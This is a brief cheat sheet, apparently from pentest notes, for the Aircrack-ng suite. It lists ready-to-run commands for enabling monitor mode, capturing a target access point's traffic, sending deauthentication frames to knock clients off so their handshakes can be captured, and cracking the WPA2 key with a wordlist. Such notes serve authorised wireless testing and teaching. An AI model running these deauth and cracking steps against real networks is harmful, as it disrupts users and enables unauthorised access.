Aircrack-ng Suite

Setup monitor mode, dump and replay specific frames, and crack it, that's aircrack-ng suite.

Documentation

Aircrack-ng suite contains more air* tools, review the documentation on project homepage https://www.aircrack-ng.org

airmon-ng - Monitor Mode

airmon-ng <start|stop> <interface> [channel] airmon-ng <check> [kill]

Start monitor for all channels

airmon-ng start wlan0

PHY     Interface       Driver          Chipset
phy0    wlan0           88XXau          Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
                (monitor mode enabled)

Stop Monitor

airmon-ng stop wlan0
PHY     Interface       Driver          Chipset

phy0    wlan0           88XXau          Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
                (monitor mode disabled)

Start Monitor for a specific channel

airmon-ng start wlan0 6

airodump-ng - Display Networks and Associations

airodump-ng <options> <interface>[,<interface>,...]

airodump-ng - Dump Traffic into PCAP (-w)

Capture the network traffic on a specific access point (--bssid) and write into pcap files with (-w) prefix.

airodump-ng --bssid 6E:C7:EC:62:0D:F9 --channel 6 -w PSK wlan0

aireplay-ng

aireplay-ng <options> <replay interface>

--deauth count

You might want to deasociate client to make it associate again in order to capture more handshakes and IVS.

To collect handshakes use --deauth mode to disassociate client form its base station (access point). The next number is a count. It states whether to disassociate one client (1) or all clients (0).

aireplay-ng --deauth 1 -a ACCESS_POINT_MAC -c CLIENT_MAC wlan0

aircrack-ng

Aircrack is the final tool for all attack methods WEP, WPA, WPA2 ...

WPA2-PSK

You have a pcap file with network traffic, bssid MAC address and a wordlist with password candidates.

aircrack-ng -w ./wordlist.txt -b 6E:C7:EC:62:0D:F9 /root/PSK-01.cap    

Last updated